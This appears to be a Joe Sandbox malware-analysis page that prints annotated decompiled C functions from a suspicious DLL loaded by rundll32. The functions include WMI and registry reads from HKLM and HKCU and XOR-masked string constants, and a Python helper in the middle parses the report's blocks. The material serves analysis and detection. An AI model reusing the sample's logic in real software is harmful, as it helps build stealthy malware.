                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1b8e523e8e8101765705de908528e290821a0ddb7757764030301cb4acbc0cb3
                                                  • Instruction ID: a09d94f070e06581b29c19605a94e09cb550b48e340f35ab5854eda4305426c6
                                                  • Opcode Fuzzy Hash: 1b8e523e8e8101765705de908528e290821a0ddb7757764030301cb4acbc0cb3
                                                  • Instruction Fuzzy Hash: F611C171A00244AEEF209EB988407EE7BA8EB54358F11453FDE90DA380F674E5C98BD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                  			E046B6A56(intOrPtr __eax, void* __ecx, signed int __edx, intOrPtr _a4) {
                                                  				unsigned int _v24;
                                                  				signed int _v28;
                                                  				void* _t11;
                                                  				unsigned int* _t12;
                                                  				signed int _t14;
                                                  				void* _t16;
                                                  				signed int _t17;
                                                  				unsigned int _t21;
                                                  				signed int _t24;
                                                  				void* _t25;
                                                  				void* _t28;
                                                  				signed int _t31;
                                                  
                                                  				_t24 = __edx;
                                                  				__imp__(0, 0x400000, 0, _t25, _t28, __ecx, __ecx); // executed
                                                  				 *0x46bd238 = __eax;
                                                  				if(__eax != 0) {
                                                  					__imp__();
                                                  					 *0x46bd1a8 = __eax;
                                                  					_t11 = E046B8F10(__eax, _a4);
                                                  					if(_t11 == 0) {
                                                  						do {
                                                  							_t12 =  &_v24;
                                                  							__imp__(_t12);
                                                  							__imp__();
                                                  							_t21 = _v24;
                                                  							_t14 = (_t21 << 0x00000020 | _v28) >> 7;
                                                  							L046BB226();
                                                  							_t31 = _t12 + _t14;
                                                  							_t16 = E046B7E03(_a4, _t31);
                                                  							_t17 = 2;
                                                  							_t23 = _t31;
                                                  							__imp__(_t17 << _t31, _t14, _t21 >> 7, 9, 0); // executed
                                                  						} while (_t16 == 1);
                                                  						if(E046B6B96(_t23) != 0) {
                                                  							 *0x46bd260 = 1; // executed
                                                  						}
                                                  						_t11 = E046B225B(_t24); // executed
                                                  					}
                                                  				} else {
                                                  					_t11 = 8;
                                                  				}
                                                  				return _t11;
                                                  			}

                                                  • Instruction address column for the listing above (alignment lost in extraction): 0x046b6a56 to 0x046b6afe in the rundll32 dump at 0x046B0000

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
• Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
• Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 727c66b4140e4909872ff4fe489ace9ef1eefc904ebd9c579e67a3c0010230a9
                                                  • Instruction ID: cf9b3edc6e0f3b5325556711f7e4175d13cea74e96a4343e706055ebff669176
                                                  • Opcode Fuzzy Hash: 727c66b4140e4909872ff4fe489ace9ef1eefc904ebd9c579e67a3c0010230a9
                                                  • Instruction Fuzzy Hash: 0E11C2726002006FE724AB64DC59BAA3698DB44754F00452CFA84CA280FAB5F9D087E6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
• Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
• Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 544d6a92c0ae096eb4745d134e66f1c2e39bb4bea8d57131c291256e9e0cb209
                                                  • Instruction ID: f5795c8fd41e0d2dd2a9856436351f431b43f78a682adc4e726aad90cf961300
                                                  • Opcode Fuzzy Hash: 544d6a92c0ae096eb4745d134e66f1c2e39bb4bea8d57131c291256e9e0cb209
                                                  • Instruction Fuzzy Hash: E30192B26453215FD3209E698C49E6B7F98EB96790F111518F981D7340FA64DC4587E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 32%
			E046B21CD(void* __ecx, signed char* _a4) {
				char _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t18;
				signed short* _t21;
				void* _t23;
				intOrPtr* _t26;

				_t23 = 0;
				_push(0);
				_t18 = 1;
				_t26 = 0x46bd330; // annotation: output table; up to three values are stored here in the loop below
				E046B84D5();
				while(1) {
					_t8 = E046B12D4(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E046B809F(_t14);
					if(_t15 == 0) {
						__imp__( *0x46bd238, 0, _v8); // annotation: (handle, 0, ptr) argument shape matches HeapFree; the decompiler did not resolve the import name
						break;
					} else {
						 *_t26 = _t15;
						_t26 = _t26 + 4;
						_t23 = _t23 + 1;
						if(_t23 < 3) {
							continue;
						} else {
						}
					}
				}
				L7:
				_push(1);
				E046B84D5();
				if(_t18 != 0) {
					_t21 =  *0x46bd338; // 0x5029b70
					_t11 =  *_t21 & 0x0000ffff;
					// annotation: ASCII-uppercase the first UTF-16 unit of the string at *0x46bd338:
					// 0x61..0x7a is 'a'..'z', and subtracting 0x20 maps it to 'A'..'Z'; anything else is left as is
					if(_t11 < 0x61 || _t11 > 0x7a) {
						_t12 = _t11 & 0x0000ffff;
					} else {
						_t12 = (_t11 & 0x0000ffff) - 0x20;
					}
					 *_t21 = _t12;
				}
				return _t18;
				}
				_t18 = 0;
				goto L7;
			}

Basic-block addresses (side column of the report view, one per line of the listing; 0x00000000 where the plugin emitted none): 0x046b21d5, 0x046b21d9, 0x046b21da, 0x046b21db, 0x046b21e0, 0x046b21e5, 0x046b21ec, 0x046b21f3, 0x00000000, 0x00000000, 0x046b21f5, 0x046b21fa, 0x046b21fb, 0x046b2202, 0x046b221c, 0x00000000, 0x046b2204, 0x046b2204, 0x046b2206, 0x046b2209, 0x046b220d, 0x00000000, 0x00000000, 0x046b220f, 0x046b220d, 0x046b2224, 0x046b2224, 0x046b2226, 0x046b222d, 0x046b222f, 0x046b2235, 0x046b223c, 0x046b224c, 0x046b2244, 0x046b2247, 0x046b2247, 0x046b224f, 0x046b224f, 0x046b2258, 0x046b2258, 0x046b2222, 0x00000000

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
• Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
• Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 58aefad1ecb49e1da6817f010915a724ae3c74426a7f6f84e7e0685d8e48165d
                                                  • Instruction ID: d70f0a1cc44f88928e0d23c1d9c456eb2aa74ae7cb784894903062d9482e9a9c
                                                  • Opcode Fuzzy Hash: 58aefad1ecb49e1da6817f010915a724ae3c74426a7f6f84e7e0685d8e48165d
                                                  • Instruction Fuzzy Hash: 6A01F535210204AAF7106EEACC88BEA72D9EB55364F40047AAAC4CB250F679FCC193E4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
			E046BA72D(intOrPtr _a4, intOrPtr* _a8) {
				void* _t9;
				void* _t11;
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr* _t17;
				intOrPtr* _t19;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr* _t28;

				_t28 = E046B2049(_t9, 8); // annotation: 8-byte block holding two interface pointers, _t28[0] and _t28[1]
				if(_t28 == 0) {
					_t11 = 8;
					return _t11;
				}
				_t12 =  *0x46bd27c; // 0x96a5a8
				_t2 = _t12 + 0x46be1bc; // 0x6f0072 (annotation: the dword reads as the UTF-16 prefix "ro")
				_t14 = E046B7B5D(_t2, _a4, _t28); // executed
				_t27 = _t14;
				if(_t27 < 0) {
					L6:
					E046B9039(_t14, _t28);
					return _t27;
				}
				_t17 =  *_t28;
				_t3 = _t28 + 4; // 0x4
				_t25 =  *0x46bd27c; // 0x96a5a8
				_t4 = _t25 + 0x46be1fc; // 0x740053 (annotation: the dword reads as the UTF-16 prefix "St")
				// annotation: indirect call through vtable slot 6 (offset 0x18) of the interface in _t28[0], with
				// five arguments (string, 0, 0, &_t28[1], 0). That is the argument shape of
				// IWbemServices::GetObject(strObjectPath, lFlags, pCtx, ppObject, ppCallResult); the name is inferred
				// from the shape and from the report's WMI registry signatures, it was not resolved by the decompiler.
				_t27 =  *((intOrPtr*)( *_t17 + 0x18))(_t17, _t4, 0, 0, _t3, 0);
				if(_t27 < 0) {
					_t19 =  *_t28;
					 *((intOrPtr*)( *_t19 + 8))(_t19); // annotation: slot 2 (offset 8) called with only `this`: IUnknown::Release on failure
					_t14 = _a4;
				} else {
					_t14 = 0;
					 *_a8 = _t28;
				}
				if(_t27 < 0) {
					goto L6;
				}
				return _t14;
			}

Basic-block addresses (side column of the report view, one per line of the listing; 0x00000000 where the plugin emitted none): 0x046ba739, 0x046ba73d, 0x046ba7a3, 0x00000000, 0x046ba7a3, 0x046ba73f, 0x046ba748, 0x046ba74f, 0x046ba754, 0x046ba758, 0x046ba797, 0x046ba798, 0x00000000, 0x046ba79d, 0x046ba75a, 0x046ba760, 0x046ba764, 0x046ba76e, 0x046ba779, 0x046ba77d, 0x046ba788, 0x046ba78d, 0x046ba790, 0x046ba77f, 0x046ba782, 0x046ba784, 0x046ba784, 0x046ba795, 0x00000000, 0x00000000, 0x046ba7a7

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
• Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
• Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dbbd3d70b1df411ca02779265c1cb52c391f49bc40b333c89661ec08e14234ed
                                                  • Instruction ID: 6c04ec7ce3876abd3cee76b9ae9abcbe61b02b1d9bf0c7b3254a0c45271f8e62
                                                  • Opcode Fuzzy Hash: dbbd3d70b1df411ca02779265c1cb52c391f49bc40b333c89661ec08e14234ed
                                                  • Instruction Fuzzy Hash: FC01A539204604ABD711CAA4C844F9677B9EFC9754F208429FA488F340FA76E881C7D0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 34%
			E046B9318(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				// annotation: with _v20 (the vt word) already zeroed, 3 x stosd + stosw clear the remaining 14 bytes:
				// a 16-byte VARIANT initialised to VT_EMPTY, the manual equivalent of VariantInit
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x46bd27c; // 0x96a5a8
				_t4 = _t15 + 0x46be39c; // 0x5028944
				_t20 = _t4;
				_t6 = _t15 + 0x46be124; // 0x650047 (annotation: the dword reads as the UTF-16 prefix "Ge")
				_t17 = E046B9152(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed; annotation: 0x80000002 is HKEY_LOCAL_MACHINE, the result lands in the VARIANT at &_v20
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) { // annotation: VT_BSTR is 8; any non-string value is reported as status 1
						_t23 = 1;
					} else {
						_t19 = E046B9FC9(_t17, _t20, _v12); // annotation: _v12 is the VARIANT's value slot, i.e. the BSTR; inferred to return a copy, since the original is freed right after
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12); // annotation: import by ordinal; if it resolves into oleaut32, #6 is SysFreeString, releasing the BSTR
					}
				}
				return _t23;
			}

Basic-block addresses (side column of the report view, one per line of the listing): 0x046b9322, 0x046b9324, 0x046b932b, 0x046b932c, 0x046b932d, 0x046b932e, 0x046b9334, 0x046b9339, 0x046b9339, 0x046b9343, 0x046b9355, 0x046b935c, 0x046b938b, 0x046b935e, 0x046b9363, 0x046b9388, 0x046b9365, 0x046b9368, 0x046b936f, 0x046b937a, 0x046b9371, 0x046b9374, 0x046b9374, 0x046b937e, 0x046b937e, 0x046b9363, 0x046b9392

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
• Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
• Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 14d836b4b8dd377c1d5d5fc7a9606326bf12c4e3a938d25fe58a78582854128f
                                                  • Instruction ID: 2c1ca6d8c4d8da2f23ec536812fb953f860387dde993c024f5e7ce250403b269
                                                  • Opcode Fuzzy Hash: 14d836b4b8dd377c1d5d5fc7a9606326bf12c4e3a938d25fe58a78582854128f
                                                  • Instruction Fuzzy Hash: E6019E72500219BBDB119FA8CC44CEEBBB8EB44710B004825EA51E62A0F371A99997E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 41%
			E046B89D6(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				char _v12;
				void* _t15;
				void* _t20;
				void* _t23;
				signed short* _t24;

				_t23 = E046B809F(0, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
					_t24 = _t23 + _a16 * 2; // annotation: _a16 indexes a UTF-16 buffer, hence the * 2
					 *_t24 =  *_t24 & 0x00000000; // executed; annotation: NUL-terminates the string at that index
					_t15 = E046B904E(__ecx, _a4, _a8, _t23); // executed
					_t20 = _t15;
					if(_t20 == 0) {
						__imp__( &_v12);
						_push( &_v12);
						 *_t24 = 0x5f; // annotation: 0x5f is '_': the NUL written above is replaced by an underscore, so the full buffer is used for the write below
						_t20 = E046BA635(__edx, 8, _a4, 0x80000001, _a8, _t23); // annotation: 0x80000001 is HKEY_CURRENT_USER
					}
					__imp__( *0x46bd238, 0, _t23); // annotation: (handle, 0, ptr) argument shape matches HeapFree; name not resolved by the decompiler
				}
				return _t20;
			}

Basic-block addresses (side column of the report view, one per line of the listing): 0x046b89e9, 0x046b89ed, 0x046b8a47, 0x046b89ef, 0x046b89f6, 0x046b89fc, 0x046b8a00, 0x046b8a05, 0x046b8a09, 0x046b8a0f, 0x046b8a18, 0x046b8a1d, 0x046b8a32, 0x046b8a32, 0x046b8a3d, 0x046b8a3d, 0x046b8a4e

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
• Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
• Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2d21cb9b1835f8eb062935d8be2aba94d833a25df110c6177420e9b17741d6d1
                                                  • Instruction ID: 30283cbef0f0d0210b9e02655c643c4f2d87f15e4fd069daf0ab1750e311217f
                                                  • Opcode Fuzzy Hash: 2d21cb9b1835f8eb062935d8be2aba94d833a25df110c6177420e9b17741d6d1
                                                  • Instruction Fuzzy Hash: CB017132200609BADF216FA49C44EDA7BBDEF84314F004429FA809B151FB75E9958790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
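The function blocks on this page share one layout: an optional decompiled body under a "C-Code - Quality" header, then a "Memory Dump Source" section carrying the Opcode ID, Instruction ID and fuzzy hashes that the report uses for similarity, closed by a "Uniqueness Score" line. The Python below is an added example, not part of the report and not Joe Sandbox code: it parses that layout into records, drops the "Download File" link residue, and flags the registry-hive literals (0x80000001 HKEY_CURRENT_USER, 0x80000002 HKEY_LOCAL_MACHINE) and ordinal imports (`__imp__#6`) in each body, so the two WMI registry helpers E046B9318 and E046B89D6 stand out. The sample text is constructed from trimmed copies of this page's own blocks (IDs as printed, bodies cut to the relevant lines, the last block without code, as happens on the page); the record field names are the example's own.

```python
"""Parse the function blocks of a Joe Sandbox decompilation page (added example)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Predefined registry hive handles that appear as literals in the bodies.
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
HEADER_RE = re.compile(r"^C-Code - Quality: (\d+)%")
FUNC_RE = re.compile(r"^(E[0-9A-Fa-f]{8})\(")          # decompiler function name
FIELD_RE = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")   # "• Key: value" bullet
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(-?[0-9.]+)%")
HIVE_RE = re.compile(r"0x8000000[0-3]\b")
ORDINAL_RE = re.compile(r"__imp__#(\d+)")              # import by ordinal
FIELD_ATTR = {"Opcode ID": "opcode_id", "Instruction ID": "instruction_id"}


@dataclass
class FunctionRecord:                 # field names are this example's own
    name: str = ""
    quality: Optional[int] = None
    source_file: str = ""
    offset: str = ""
    opcode_id: str = ""               # same value as "Opcode Fuzzy Hash" on this page
    instruction_id: str = ""
    uniqueness: Optional[float] = None
    hives: List[str] = field(default_factory=list)
    ordinal_imports: List[int] = field(default_factory=list)
    body: str = ""


def _set_field(rec, key, value):
    value = value.replace("Download File", "").strip()   # interactive-page link residue
    if key == "Source File":          # "<dump>.sdmp, Offset: <hex>, based on PE: <bool>"
        parts = [p.strip() for p in value.split(",")]
        rec.source_file = parts[0]
        rec.offset = next((p.split(":", 1)[1].strip() for p in parts
                           if p.startswith("Offset:")), "")
    elif key in FIELD_ATTR:
        setattr(rec, FIELD_ATTR[key], value)


def _finish(rec):
    """Derive the triage fields from the collected body text."""
    rec.hives = sorted({HIVES[int(h, 16)] for h in HIVE_RE.findall(rec.body)})
    rec.ordinal_imports = sorted({int(n) for n in ORDINAL_RE.findall(rec.body)})
    return rec


def parse_blocks(text: str) -> List[FunctionRecord]:
    """One FunctionRecord per "Memory Dump Source" block, in page order."""
    records, rec, body, in_meta = [], FunctionRecord(), [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Memory Dump Source"):
            in_meta, rec.body = True, "\n".join(body)
        elif in_meta:
            m = SCORE_RE.match(line)
            if m:                                   # the score line closes a block
                rec.uniqueness = float(m.group(1))
                records.append(_finish(rec))
                rec, body, in_meta = FunctionRecord(), [], False
            else:
                m = FIELD_RE.match(line)
                if m:
                    _set_field(rec, m.group(1).strip(), m.group(2))
        else:
            m = HEADER_RE.match(line)
            if m:
                rec.quality = int(m.group(1))
                continue
            m = FUNC_RE.match(line)
            if m and not rec.name:                  # first "E........(" names the function
                rec.name = m.group(1)
            body.append(raw)
    return records


# Constructed sample: three blocks in the report's layout, bodies trimmed to the
# lines that matter; IDs are as printed on the page, the last block has no code.
SAMPLE = """\
C-Code - Quality: 34%
    E046B9318(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
        _t17 = E046B9152(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
        __imp__#6(_v12);
    }

Memory Dump Source
• Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
• Opcode ID: 14d836b4b8dd377c1d5d5fc7a9606326bf12c4e3a938d25fe58a78582854128f
• Instruction ID: 2c1ca6d8c4d8da2f23ec536812fb953f860387dde993c024f5e7ce250403b269
Uniqueness Score: -1.00%
C-Code - Quality: 41%
    E046B89D6(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
        _t20 = E046BA635(__edx, 8, _a4, 0x80000001, _a8, _t23);
    }
Memory Dump Source
• Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
• Opcode ID: 2d21cb9b1835f8eb062935d8be2aba94d833a25df110c6177420e9b17741d6d1
Uniqueness Score: -1.00%
Memory Dump Source
• Opcode ID: 544d6a92c0ae096eb4745d134e66f1c2e39bb4bea8d57131c291256e9e0cb209
Uniqueness Score: -1.00%
"""
```

`parse_blocks(SAMPLE)` yields three records; the first carries `hives == ["HKEY_LOCAL_MACHINE"]` and `ordinal_imports == [6]`, the second `hives == ["HKEY_CURRENT_USER"]`, the third has no name or quality. Feed it a whole report dump and the `opcode_id` field is the key to match a function against another sample's blocks, since Joe Sandbox prints the same Opcode ID for identical code at a different address.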

                                                  C-Code - Quality: 58%
			E046B1262(intOrPtr* __esi, intOrPtr _a4, unsigned int _a8, char _a12) {
				signed short _t18;
				intOrPtr _t23;
				signed int _t25;
				signed short _t26;

				if(_a4 != 0) {
					_t18 = E046B9318(_a4, _a8, _a12, __esi); // executed; annotation: the WMI read path (E046B9318 above)
					_t26 = _t18;
				} else {
					_t26 = E046B6BFA(0, 0x80000002, _a8, _a12,  &_a12,  &_a8); // annotation: direct read, 0x80000002 is HKEY_LOCAL_MACHINE; inferred from the later use to return the value buffer in _a12 and its byte size in _a8
					if(_t26 == 0) {
						_t25 = _a8 >> 1; // annotation: byte size to UTF-16 unit count
						if(_t25 == 0) {
							_t26 = 2;
							__imp__( *0x46bd238, 0, _a12); // annotation: empty value: buffer released, status 2 returned
						} else {
							_t23 = _a12;
							 *(_t23 + _t25 * 2 - 2) =  *(_t23 + _t25 * 2 - 2) & _t26; // annotation: _t26 is 0 here, so the last UTF-16 unit is cleared: in-place NUL termination
							 *__esi = _t23;
						}
					}
				}
				return _t26;
			}

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 447fbbfea3219997d769c046bf4a817c5b91f1ae33e6234bc9fc58fbc221a90f
                                                  • Instruction ID: 4fdfe8fb69aaba3f6f6858d9903bb3718cf3275fd82dc6e7a1065371290ad673
                                                  • Opcode Fuzzy Hash: 447fbbfea3219997d769c046bf4a817c5b91f1ae33e6234bc9fc58fbc221a90f
                                                  • Instruction Fuzzy Hash: CB011236100249FBDB119F44CC11FEA3BB5EB553A0F148429FB559A260E731E5A1D790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                  			E046B54BC(void* __ecx) {
                                                  				signed int _v8;
                                                  				void* _t15;
                                                  				void* _t19;
                                                  				void* _t20;
                                                  				void* _t22;
                                                  				intOrPtr* _t23;
                                                  
                                                  				_t23 = __imp__; // 0x75144a00
                                                  				_t20 = 0;
                                                  				_v8 = _v8 & 0;
                                                  				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                  				_t10 = _v8;
                                                  				if(_v8 != 0) {
                                                  					_t20 = E046B2049(_t10 + 1, _t10 + 1);
                                                  					if(_t20 != 0) {
                                                  						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                  						if(_t15 != 0) {
                                                  							 *((char*)(_v8 + _t20)) = 0;
                                                  						} else {
                                                  							E046B9039(_t15, _t20);
                                                  							_t20 = 0;
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t20;
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de3d47e7a0645f0bb13fd8d85002cf0189a88631fe26ed6b8a68134be3098341
                                                  • Instruction ID: 1aaf550f3c7e315896ebcd60bb488b7e17fbb13de87bed96170bbfb1cf3d63bf
                                                  • Opcode Fuzzy Hash: de3d47e7a0645f0bb13fd8d85002cf0189a88631fe26ed6b8a68134be3098341
                                                  • Instruction Fuzzy Hash: F9F0BE23600109BAEB10D6AA8C00EEF37FEDBC5649F14406AA941D3200FA70EF4287F0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E046B96A4(void* __ecx) {
                                                  				signed int _v8;
                                                  				char _v12;
                                                  				void* _t10;
                                                  				void* _t12;
                                                  				intOrPtr _t14;
                                                  				intOrPtr _t17;
                                                  				intOrPtr _t18;
                                                  				intOrPtr _t21;
                                                  				intOrPtr _t23;
                                                  
                                                  				_t10 =  *0x46bd270; // 0xd448b889
                                                  				_v8 = _t10;
                                                  				_v12 = _t10;
                                                  				_t23 = 0; // executed
                                                  				_t12 = E046B21CD(__ecx,  &_v12); // executed
                                                  				if(_t12 != 0) {
                                                  					_t14 =  *0x46bd27c; // 0x96a5a8
                                                  					_t4 = _t14 + 0x46be796; // 0x74666f53
                                                  					_t17 = E046B7A9A(_t4, 0);
                                                  					 *0x46bd33c = _t17;
                                                  					if(_t17 != 0) {
                                                  						_t18 =  *0x46bd27c; // 0x96a5a8
                                                  						_v8 = _v8 ^ 0x738bb12a;
                                                  						_t8 = _t18 + 0x46be862; // 0x61636f4c
                                                  						_t21 = E046B7A9A(_t8, 1);
                                                  						 *0x46bd344 = _t21;
                                                  						if(_t21 != 0) {
                                                  							_t23 = 1;
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t23;
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a817bebc5cc0a39903c65548143b499671f2eca93567059ab296523a9b09afd3
                                                  • Instruction ID: 71103d43bade42c7fa5454781c143a5cdfa51abe5fcddfab5fac2cd94faddee6
                                                  • Opcode Fuzzy Hash: a817bebc5cc0a39903c65548143b499671f2eca93567059ab296523a9b09afd3
